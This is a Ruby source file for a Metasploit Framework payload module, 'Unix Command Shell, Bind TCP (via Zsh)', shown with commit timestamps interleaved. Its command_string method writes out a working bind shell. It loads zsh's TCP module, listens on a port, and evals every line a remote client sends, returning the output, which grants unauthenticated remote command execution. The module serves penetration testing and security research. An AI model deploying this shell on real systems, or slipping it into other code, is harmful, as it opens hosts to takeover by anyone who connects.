metasploit-framework/modules/payloads/singles/cmd/unix/bind_zsh.rb

62 lines
1.6 KiB
Ruby
Raw Normal View History

2013-06-20 18:45:02 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-06-20 18:45:02 +00:00
##
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
2016-03-08 13:02:44 +00:00
module MetasploitModule
2013-06-20 18:45:02 +00:00
CachedSize = 112
2013-08-30 21:28:54 +00:00
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
2013-06-20 18:45:02 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via Zsh)',
'Description' => %q{
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
},
'Author' =>
[
'Doug Prostko <dougtko[at]gmail.com>'
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'zsh',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
2013-06-20 18:45:02 +00:00
2013-08-30 21:28:54 +00:00
#
# Constructs the payload
#
def generate
return super + command_string
end
2013-06-20 18:45:02 +00:00
2013-08-30 21:28:54 +00:00
#
# Returns the command string to use for execution
#
def command_string
cmd = "zmodload zsh/net/tcp;"
cmd << "ztcp -l #{datastore['LPORT']};"
cmd << "ztcp -a $REPLY;"
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
cmd << "ztcp -c"
cmd
end
2013-06-20 18:45:02 +00:00
end